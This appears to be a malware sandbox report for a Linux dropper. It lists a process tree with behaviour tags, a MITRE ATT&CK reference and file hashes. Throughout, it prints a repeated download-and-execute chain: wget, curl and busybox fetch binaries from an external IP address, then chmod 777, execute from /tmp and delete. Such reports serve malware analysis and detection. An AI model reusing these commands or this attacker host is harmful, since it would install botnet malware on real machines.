/usr/bin/wgetwget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:1647
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:1649
-
-
/bin/chmodchmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:1652
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:1653
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:1655
-
-
/bin/chmodchmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1657
-
-
/bin/rmrm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:1658
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:1659
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Writes file to tmp directory
PID:1660
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:1661
-
-
/bin/chmodchmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- File and Directory Permissions Modification
PID:1662
-
-
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Executes dropped EXE
PID:1663
-
-
/bin/rmrm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:1664
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:1665
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:1667
-
-
/bin/chmodchmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Executes dropped EXE
PID:1669
-
-
/bin/rmrm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:1670
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:1671
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Writes file to tmp directory
PID:1672
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:1673
-
-
/bin/chmodchmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- File and Directory Permissions Modification
PID:1674
-
-
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Executes dropped EXE
PID:1675
-
-
/bin/rmrm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:1676
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:1677
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Writes file to tmp directory
PID:1678
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:1679
-
-
/bin/chmodchmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- File and Directory Permissions Modification
PID:1680
-
-
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Executes dropped EXE
PID:1681
-
-
/bin/rmrm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:1682
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97